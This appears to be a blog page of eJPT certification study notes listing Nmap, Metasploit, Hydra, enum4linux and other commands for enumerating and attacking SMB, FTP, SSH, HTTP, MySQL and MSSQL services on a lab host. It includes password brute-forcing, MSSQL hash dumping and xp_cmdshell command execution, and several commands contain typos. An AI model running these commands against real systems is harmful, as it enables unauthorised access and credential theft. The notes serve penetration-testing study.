Get in touch
I'm always excited to connect with professionals, collaborate on cybersecurity projects, or share insights.
Email
I'm always excited to connect with professionals, collaborate on cybersecurity projects, or share insights.
Table of contents [Show]
nmap -p 445 --script smb-protocols 10.10.10.10
//Enumerates the supported SMB protocols on the target.
nmap -p 445 --script smb-os-discovery 10.10.10.10
//Discovers the operating system on the SMB server.
nmap -p 445 --script smb-security-mode 10.10.10.10
//Identifies the security mode employed by the SMB server.
nmap -p 445 --script smb-enum-sessions 10.10.10.10
//Lists active SMB sessions on the server.
nmap -p 445 --script smb-enum-sessions --script-args smbusername=adminstartor,smbpassword=smbserver_771 10.10.10.10
//Enumerates sessions with specified credentials.
nmap -p 445 --script smb-enum-shares 10.10.10.10
//Lists available SMB shares on the server.
nmap -p 445 --script smb-enum-shares --script-args smbusername=adminstartor,smbpassword=smbserver_771 10.10.10.10
//Enumerates shares with specified credentials.
nmap -p 445 --script smb-enum-users --script-args smbusername=adminstartor,smbpassword=smbserver_771 10.10.10.10 //Enumerates users with specified credentials.
nmap -p 445 --script smb-server-stats --script-args smbusername=adminstartor,smbpassword=smbserver_771 10.10.10.10
//Retrieves statistics from the SMB server with specified credentials.
nmap -p 445 --script smb-enum-domains --script-args smbusername=adminstartor,smbpassword=smbserver_771 10.10.10.10
//Enumerates domains with specified credentials.
msfconsole
[MODULE]> use auxiliary/scanner/smb/smb_version
//Uses Metasploit to gather the SMB version information.
msfconsole
[MODULE]> auxiliary/scanner/smb/smb2
//Uses Metasploit to check for SMB2 support.
nmblookup -A 10.10.10.10
//Uses Nmblookup to obtain the SMB version information.
smbclient -L 10.10.10.10 -N
//Lists available SMB shares on the server using Smbclient.
rpcclient -U -N 10.10.10.10
[rpcclient$]> srvinfo
[rpcclient$]> enumdomusers
[rpcclient$]> lookupnames admin
//Connects to the SMB server using Rpcclient and performs various actions.
enum4linux -o 10.10.10.10
//Gathers operating system information from the SMB server using Enum4Linux.
enum4linux -U 10.10.10.10
//Enumerates users on the SMB server using Enum4Linux.
nmap -p 21 -sV
//Performs a quick scan to check if the FTP port (21) is open on the target.
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/wordlists/rockyou.txt 10.10.10.10 ftp
//Conducts a dictionary attack on the FTP server using Hydra.
nmap 10.10.10.10 --script=ftp-brute --script-args userdb=/root/users -p 21
//Performs FTP brute force using Nmap.
nmap -p 21 -sV --script-ftp-anon
//Checks if anonymous login is allowed on the FTP server.ftp 10.10.10.10
[ftp]> user: anonymous
[ftp]> pass:
Successful login with anonymous credentials.
nmap 10.10.10.10 -p 22 -sV -O
//Performs a quick scan to check the SSH service and identify the operating system.
nmap 10.10.10.10 -p 22 --script ssh2-enum-algos
//Enumerates all SSH algorithms supported by the server.
nmap 10.10.10.10 -p 22 --script ssh-hostkey --script-args ssh_hostkey=full
//Retrieves the SSH host key.
nmap 10.10.10.10 -p 22 --script ssh-auth-methods --script-args=ssh.user=Jack
//Identifies supported SSH authentication methods.
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.10 ssh
//Conducts a dictionary attack on the SSH server using Hydra.
echo administrator > user
nmap 10.10.10.10 -p 22 --script ssh-brute --scrip-args userdb=/root/user
//Performs SSH brute force using Nmap.
msfconsole
[MODULE]> auxiliary/scanner/ssh/ssh-login
nmap 10.10.10.10 -p 80 -sV -O
//Performs a quick scan to check the HTTP service and identify the operating system.
whatweb 10.10.10.10
//Utilizes WhatWeb to identify vulnerabilities in the web application.
http 10.10.10.10
//Performs an HTTP request to gather information about the web server.
dirb http://10.10.10.10
//Uses Dirb to discover common directories and files on the web server.
nmap 10.10.10.10 -p 80 -sV --script http-enum
//Executes Nmap scripts to enumerate information about the HTTP service.
nmap 10.10.10.10 -p 80 -sV --script http-headers
//Retrieves detailed HTTP headers from the web server.
nmap 10.10.10.10 -p 80 -sV --script http-methods --script-args http-method.url-path=/webdav/
//Identifies supported HTTP methods, with an additional check for the '/webdav/' path.
[MODULE]> auxiliary/scanner/http/brute_dirs
//Uses Metasploit to brute force directories on the Apache web server.
[MODULE]> auxiliary/scanner/http/http_v
//Identifies the version of the HTTP service using Metasploit.
[MODULE]> auxiliary/scanner/http/robots_txt
//Scans for the existence of robots.txt using Metasploit.
nmap 10.10.10.10 -p 3306 -sV -O
//Conducts a quick scan to check the SQL service and identify the operating system.
nmap 10.10.10.10 -p 3306 --script=mysql-empty-password
//Checks if the MySQL server allows login with an empty password.
nmap 10.10.10.10 -p 3306 --script=mysql_info
//Retrieves detailed information about the MySQL service.
nmap 10.10.10.10 -p p 3306 --script=mysql-users --script-args=mysqluser='root', mysqlpass=''
//Enumerates MySQL users on the server.
nmap 10.10.10.10 -p p 3306 --script=mysql-databases --script-args=mysqluser='root', mysqlpass=''
//Lists the databases present on the MySQL server.
nmap 10.10.10.10 -p p 3306 --script=mysql-audit --script-args=mysql-audit.username='root', mysql-audit.password='', mysql-audit.filename='/usr/share/nmap/uselib/data/mysql-cis.audit'
//Performs an audit on MySQL for security compliance.
nmap 10.10.10.10 -p p 3306 --script=mysql-query --script-args=mysqluser='root', mysqlpass='', query='select count(*) from books.authors;'
//Executes a specific query on the MySQL server.mysql -h 10.10.10.10 -u root
//Logs into the MySQL server using the 'root' user.
[MODULE]> auxiliary/scanner/mysql/mysql_login
//Performs a dictionary attack on the MySQL server using Metasploit.
hydra -l root -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 10.10.10.10 MySQL
nmap 10.10.10.10 -p 1433 --script ms-sql-info
//Gathers information about the MSSQL service.
nmap 10.10.10.10 -p 1433 --script ms-sql-ntlm-info --script-args mssql.instance-port=1433
//Retrieves NTLM information from the MSSQL server.
nmap 10.10.10.10 -p 1433 --script ms-sql-brute --script-args userdb=/usr/share/wordlist/common_users.txt,passdb=/root/Desktop/wordlist/100-common-passwords.txt
//Performs a brute force attack on the MSSQL server.
nmap 10.10.10.10 -p 1433 --script ms-sql-empty-password
//Checks if the MSSQL server allows login with an empty password.
nmap 10.10.10.10-p 1433 --script ms-sql-query --script-args mssql.username=admin,mssql.password=password,ms-sql-query.query=SELECT * FROM master..syslogins -oN output.txt
//Executes a specific query on the MSSQL server and saves the output to a file.
nmap 10.10.10.10-p 1433 --script ms-sql-dump-hashes --script-args mssql.username=admin,mssql.password=password
//Dumps password hashes from the MSSQL server.
nmap 10.10.10.10-p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=password
//Executes an XP command shell on the MSSQL server.
nmap 10.10.10.10 -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=password,ms-sql-xp-cmdshell.cmd='type C:\flag.txt'
//Executes a specific command using XP command shell on the MSSQL server.
[MODULE]> auxiliary/scanner/mssql/mssql_login
//Attempts to login to the MSSQL server using Metasploit.
[MODULE]> auxiliary/admin/mssql/mssql_enum
//Enumerates information about the MSSQL server using Metasploit.
[MODULE]> auxiliary/admin/mssql/mssql_enum_sql_logins
//Enumerates SQL logins on the MSSQL server using Metasploit.
[MODULE]> auxiliary/admin/mssql/mssql_exec
//Executes commands on the MSSQL server using Metasploit.
[MODULE]> auxiliary/admin/mssql/mssql_enum_domain_accounts
//Enumerates domain accounts on the MSSQL server using Metasploit.
In conclusion, mastering the art of information gathering is fundamental in the realm of ethical hacking and penetration testing. This compilation of notes, crafted by Amr Elsagaei , serves as a valuable reference throughout the eLearnSecurity Junior Penetration Tester (eJPT) journey.
These insights into network mapping, service enumeration, and vulnerability assessment techniques equip aspiring security professionals with the skills needed to identify and address potential threats. It's important to approach ethical hacking with responsibility and ethical standards, ensuring the integrity of security testing.
As you progress through your eJPT certification, continually expanding your knowledge and staying abreast of emerging tools and methodologies will contribute to a successful and rewarding journey in the field of cybersecurity
Check out: System-Host Based Attacks | eJPT
Your email address will not be published. Required fields are marked *
